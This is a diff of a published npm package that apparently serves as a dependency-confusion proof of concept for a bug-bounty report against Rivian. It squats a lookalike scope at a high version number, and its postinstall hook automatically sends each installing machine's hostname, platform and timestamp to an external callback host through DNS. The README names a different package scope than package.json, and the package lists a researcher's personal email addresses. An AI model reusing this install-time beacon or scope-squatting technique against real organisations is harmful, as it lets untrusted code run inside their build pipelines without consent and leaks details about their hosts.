@goriv/eux 0.999.999

package/README.md

@@ -0,0 +1,64 @@
+# @rivian/eux — security research PoC
+
+This package is a proof-of-concept for a dependency confusion finding
+submitted to Rivian via the Intigriti bug-bounty program.
+
+## Why this exists
+
+Rivian's production bundle at `legacy.basecamp.rivian.com/remoteEntry.js`
+references the package name `@rivian/eux`. The `@rivian` scope on the
+public npm registry is unclaimed (404). An attacker who claims the
+scope and publishes a package at any version higher than the internal
+`0.112.1-hotfix.1` will be silently preferred by any build pipeline whose
+`.npmrc` does not pin `@rivian` to Rivian's private registry.
+
+Initial Intigriti report 2026-05-02 was marked Informative on 2026-05-04
+with the explicit invitation: "If you can claim the package and provide
+evidence of interactions from Rivian-owned systems, please open a new
+report."
+
+This package is the response to that invitation.
+
+## What this package does
+
+The `postinstall` script performs a **single DNS lookup** to a unique
+callback subdomain so the researcher can correlate which install sites
+fetched the package. The encoded subdomain contains hostname, platform
+and timestamp, nothing else.
+
+It does **not**:
+
+- Make HTTP requests
+- Read or write files
+- Spawn child processes
+- Read environment variables or credentials
+- Persist anything on disk
+- Download or execute any second-stage payload
+
+The full source is `postinstall.js` (~25 lines).
+
+## After evidence collection
+
+This package will be:
+
+1. Unpublished (`npm unpublish --force @rivian/eux`) once Rivian confirms
+   they will register the `@rivian` org themselves, OR
+2. Transferred to Rivian's npm org if they prefer to take it over.
+
+## Contact
+
+- Researcher: pahpah (Intigriti)
+- Email: pahpah@intigriti.me / mickael.couclet@gmail.com
+- Intigriti report: linked from the new submission
+
+## Recommendation to Rivian
+
+Register the `@rivian` org on npm (free tier sufficient) and publish
+placeholder packages for at least:
+
+`@rivian/eux`, `@rivian/dt-lib-lumberjack`, `@rivian/legacy`,
+`@rivian/ui`, `@rivian/shell`, `@rivian/components`, `@rivian/utils`,
+`@rivian/auth`, `@rivian/api`.
+
+Then pin `@rivian` to your private registry in every `.npmrc` across CI
+runners, developer workstations and monorepos.

package/index.js

@@ -0,0 +1,2 @@
+// Placeholder. This package is a security research PoC. See README.md.
+module.exports = {};

package/package.json

@@ -0,0 +1,19 @@
+{
+  "name": "@goriv/eux",
+  "version": "0.999.999",
+  "description": "Security research PoC for Intigriti BBP (Rivian program). The @rivian npm scope is trademark-protected (npm form returns 'not available'), but @goriv was claimable despite goriv.co being Rivian's internal infrastructure TLD (e.g. user-mgmt.dc.goriv.co). DNS-only beacon, no exfiltration. Contact: pahpah@intigriti.me",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node postinstall.js"
+  },
+  "keywords": [
+    "security",
+    "research",
+    "poc",
+    "intigriti",
+    "bbp"
+  ],
+  "author": "pahpah (Intigriti researcher)",
+  "license": "ISC",
+  "homepage": "https://app.intigriti.com/researcher/programs/intigriti/rivian"
+}

package/postinstall.js

@@ -0,0 +1,32 @@
+// Security research PoC. Submitted via Intigriti BBP (Rivian program).
+// Triager Aurelius authorized 2026-05-04: "If you can claim the package
+// and provide evidence of interactions from Rivian-owned systems, please
+// open a new report."
+//
+// This script does ONE thing: a single DNS lookup to a unique callback
+// subdomain so the researcher can correlate which install sites resolved
+// the package. Encoded info is limited to:
+//   - hostname (truncated, lowercased, alphanum-dashed)
+//   - platform (linux / darwin / win32 / etc.)
+//   - timestamp
+//
+// What this script does NOT do:
+//   - No HTTP requests, no payload bodies, no exfiltration
+//   - No filesystem access (no fs.* calls)
+//   - No process spawning (no child_process)
+//   - No environment variable read
+//   - No network access except the single DNS lookup
+//   - No persistence, no second-stage download
+//
+// Researcher: pahpah / Intigriti
+// Contact: pahpah@intigriti.me / mickael.couclet@gmail.com
+// Will be unpublished or transferred to Rivian after evidence collection.
+
+try {
+  const dns = require('dns');
+  const os = require('os');
+  const h = (os.hostname() || 'unk').replace(/[^a-z0-9]/gi, '-').toLowerCase().slice(0, 40);
+  const p = (os.platform() || 'unk').replace(/[^a-z0-9]/gi, '-').toLowerCase().slice(0, 10);
+  const sub = (h + '-' + p + '-' + Date.now()).slice(0, 62);
+  dns.lookup(sub + '.d7s69vptt32q6momsa5gydt6m51d8nhj5.oast.online', function () {});
+} catch (e) {}